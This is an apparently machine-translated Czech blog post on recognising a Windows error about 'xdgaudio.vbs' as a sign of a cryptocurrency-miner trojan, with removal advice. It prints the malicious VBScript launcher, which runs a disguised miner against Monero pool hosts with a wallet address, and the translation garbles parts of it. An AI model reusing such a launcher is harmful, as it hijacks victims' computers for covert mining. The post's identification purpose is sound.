Pokud se vám v systému zobrazuje následující chybová zpráva týkající se souboru „xdgaudio.vbs“, je váš počítač pravděpodobně infikován.
Skript: C: windows xdgaudio.vbs
Řádek: 3
Znak: 1
Chyba: Systém nemůže najít zadaný soubor.
Kód: 80070002
Zdroj: (null)
Při úpravách v programu Poznámkový blok může skript obsahovat následující řádky:
Dim WShell Set WShell = CreateObject ('WScript.Shell') WShell.Run 'wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o vrstva + tcp: //xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv.App -px -k -o vrstva + tcp: //mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv -p x‘, 0 Nastavit WShell = nic
To určitě vypadá jako trojan CPU / kryptoměna Miner, který nejen zpomalí váš počítač, ale také může představovat bezpečnostní hrozbu. Soubory skriptu c: windows xdgaudio.vbs a c: windows servicecrsssr.vbs by měl být vymazán. To není dost. Proveďte důkladnou kontrolu pomocí antimalwaru Malwarebytes a také kontrolu pomocí antivirového softwaru, který používáte.
Podrobné pokyny k odebrání takového trojského trojského koně naleznete v příručce malwaretips.com Jak odebrat trojského koně CPU Miner z Windows (Virus Help Guide) .
Jedna malá žádost: Pokud se vám tento příspěvek líbil, sdílejte ho prosím?
Jedno „malé“ sdílení od vás by vážně hodně pomohlo s růstem tohoto blogu. Několik skvělých návrhů:- Připnout!
- Sdílejte to na svém oblíbeném blogu + Facebook, Reddit
- Tweetujte to!